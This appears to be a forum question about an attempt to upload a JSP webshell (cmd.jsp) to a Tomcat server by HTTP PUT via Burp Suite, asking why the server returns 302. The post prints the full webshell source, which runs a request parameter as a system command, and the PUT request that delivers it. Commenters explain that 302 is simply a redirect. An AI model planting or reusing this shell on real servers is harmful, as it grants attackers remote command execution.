# cmd.jsp - Tomcat - Understanding HTTP Status Code (302)

Tags: web-application, http, burp-suite, tomcat, jsp

I'm currently playing with cmd.jsp webshells on a Java webapp in tomcat.

This is the request (sending via burpsuite)

```
PUT /path/cmd.jsp HTTP/1.1
Host: 69.69.69.69   
Content-Length: 579


<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr); 
                disr = dis.readLine(); 
                }
        }
%>
```

Normally the webapp structurce is

```
https://69.69.69.69:1234/path/mylogin.jsp
```

When I try to `PUT` directly in the root directory, I get a **403 Forbidden**:

**Request:** `PUT /cmd.jsp HTTP/1.1`

**Response:** `HTTP/1.1 403` (...) `"error":"Forbidden"`,

I unterstand the response here: *simply forbidden. okay.*

But when I try to `PUT` into the subdir where the `mylogin.jsp` is normally located, then I get a **302 Found**

**Request:** `PUT /path/cmd.jsp HTTP/1.1`

**Response:** `HTTP/1.1 302`

Despite the fact that only a **201 Created** would get the job done, I'd like to understand what the 302 means here?
And what conclusions can be drawn from the 302? Does this create new opportunities?

I suspect this is independent of my PUT request. But why is cmd.jsp found even though cmd.jsp is not present (404) in this path.

When I try to call `69.69.69.69:1234/path/cmd.jsp` in the browser, I am redirected to the `/path/mylogin.jsp`.

Comment: A 302 is a redirect, i.e. you should use a the URL given in the Location header of the response instead. Same as you get with a GET request based on *"When I try to call 69.69.69.69:1234/path/cmd.jsp in the browser, I am redirected ..."*. I don't see this really as a security question, more a question of what 302 actually means in HTTP semantics.

Comment: @SteffenUllrich Thanks for the answer! Yes, I think you're right, its not really a security question. However, I wasn't sure whether the 302 came from the way the request was made or whether it was to be understood in this "security" context.

Comment: HTTP 302 has nothing to do with security and is off topic here. I suggest to migrate the question to [SO](https://stackoverflow.com/).